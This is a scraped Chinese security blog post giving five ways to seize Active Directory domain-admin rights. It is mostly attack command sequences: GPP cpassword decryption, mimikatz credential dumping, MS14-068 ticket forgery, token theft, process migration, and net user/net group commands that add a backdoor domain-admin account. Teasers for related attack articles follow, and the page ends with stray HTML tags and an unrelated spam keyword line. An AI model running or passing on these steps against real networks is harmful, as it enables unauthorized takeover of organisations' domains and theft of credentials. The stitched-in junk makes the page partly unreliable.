<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    獲取域管理員權限的幾種方式

    VSole2021-11-22 07:29:48

    在不考慮直接攻擊域控的情況下,如何快速獲取域管理員權限呢?

    在大多數情況下,攻擊者可以通過定位域管理員所登錄的服務器,利用漏洞獲取服務器system權限,找到域管理的賬號、進程或是身份驗證令牌,從而獲取域管理員權限。本文分享幾種常見的獲取域管理員權限的方式。


    第1種方式:利用GPP漏洞獲取域管理權限

    SYSVOL是域內的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導致安全問題。

    (1)訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。

    (2)使用kali自帶的gpp-decrypt進行破解,從而獲取域賬號密碼,直接登錄域管理員賬號獲取訪問權限。

    2種方式:獲取服務器明文登錄密碼

    使用kiwi模塊需要system權限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。提到system有兩個方法,一是當前的權限是administrator用戶,二是利用其它手段先提權到administrator用戶。然后administrator用戶可以直接getsystem到system權限。

    meterpreter > getuidServer username: BYPASS-E97BA3FC\Administratormeterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY\SYSTEM
    

    加載kiwi模塊

    load kiwi
    

    列舉系統中的明文密碼

    creds_all
    

    第3種方式:使用MS14-068漏洞進行提權

    MS14068是一個能夠使普通用戶提權到域控權限的權限提升漏洞。攻擊者可以通過構造特定的請求包來達到提升權限的目的。

    攻擊流程:

    第一步:利用MS14-068偽造生成TGT

    MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com
    

    第二步:利用mimikatz將工具得到的TGT票據寫入內存,創建緩存證書

    mimiktz#kerberos::ptc TGT_bypass@test.com.ccache
    

    第三步:獲取域管理員權限。創建一個 test 賬號并加入域管理員組,從而隨時可以登錄域控主機進行操作。

    PsExec.exe \\dc cmd.exe
    // 添加test用戶net user test abc123! /add /domain// 把 test 用戶添加進域管理員組net group "domain admins"  test /add /domain// 查看域管理員net group "domain admins" /domain 
    

    第4種方式:竊取域管理員令牌

    當有域控賬戶登陸至服務器時可使用令牌模擬進行滲透取得域控權限。

    1、入侵域管理員所在的服務器,竊取域管理員的令牌,從而控制整個域。

    2、直接在meterpreter shell上執行添加域管理員

    add_user test abc123! -h 域控的IP地址add_group_user "Domain Admins" test -h 域控IP地址
    

    第5種方式:進程遷移

    入侵了域管理員所登錄的服務器,將進程遷移到域管理員所運行的進程,就可以獲得域管理員權限。

    1、獲取域管理員列表

    net group "Domain Admins" /domain
    

    2、利用ps找到域管理員(TEST\bypass)所運行的進程,然后將shell進程遷移到域管理員所運行的進程中,成功后就獲得了域管理員權限。如下圖所示:

    3、輸入shell命令獲取OS shell,在本機上使用Windows命令添加新的域管理員:

    // 添加test用戶net user test admin@123 /add /domain// 把 test 用戶添加進域管理員組net group "domain admins"  test /add /domain
    

    4、成功添加了域管理員賬號test。

    testdomain
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    攻擊者在獲取到域控權限后,可以利用約束委派或者基于資源的約束委派實現后門,以實現達到維持權限的目的。基于AD Event日志監視對特定 Active Directory 屬性的修改,從而發現可疑的域委派后門。設置約束委派setspn -U -A cifs/test test
    萌新如何玩轉mimikatz
    2022-08-29 06:48:46
    暑假快到了,身邊好多師傅都開啟了"卷王"模式,而我也在南城師傅的幫助下開始了內網這個新征程;mimikatz就是我遇見的一個坎,我希望記錄下這個過程,盡可能的幫助大家更快的掌握mimikatz的用法和技巧。最后,再次謝謝南城師傅對本文的指導與幫助!!
    SharpSpray這是一個域內的密碼噴射評估工具,能通過ldap收集用戶名,并根據密碼設置策略進行自動域內的密碼噴射評估。SharpSpray是對SharpHose項目進行改造實現的,解決了原項目中無法在域外爆破、無法進行批量密碼爆破等問題,并內置了三個域內高頻率口令。
    原理黃金票據的原理就是用krbtgt的hash來偽造TGT的內容。第四步主要是來驗證客戶端的身份。所謂的黃金票據其實就是kerberos認證的第二個階段中的tgs的ticket也就是TGT。
    記一次常規的域滲透
    2023-03-30 09:48:11
    @#45""okkkkkkkkkk,嘗試登錄:發現卡巴斯基和edr,直接關閉:私密馬賽,我沒能關掉,嘗試通過導出密碼拿下高用戶的權限:reg save hklm\sam sam.hivereg save hklm\system system.hive本地secertdump解密這里我是從遠程桌面托文件下來所以很卡,只選擇下載了兩個文件,security可以選擇不下載:python secretsdump.py -system system.hive?
    內網滲透 域ACL攻防
    2022-07-20 10:44:00
    用戶認證授權成功后,Authing會簽發Access Token給應用。ACE有許多不同類型,但是在Active Directory的權限中,只有四種不同的含義,兩種分別用于授權和拒絕權限。
    CVE-2020-1472攻擊過程
    2021-12-17 16:42:22
    在去年9月份,國外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞詳情,網上也隨即公開了Exp。 是近幾年windows上比較重量級別的一個漏洞。通過該漏洞,攻擊者只需能夠訪問域控的445端口,在無需任何憑據的情況下能拿到域管的權限。 該漏洞的產生來源于Netlogon協議認證的加密模塊存在缺陷,導致攻擊者可以在沒有憑證的情況情況下通過認證。該漏洞的最穩定利用是調用netl
    在大多數情況下,攻擊者可以通過定位域管理員所登錄的服務器,利用漏洞獲取服務器system權限,找到域管理的賬號、進程或是身份驗證令牌,從而獲取域管理員權限。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类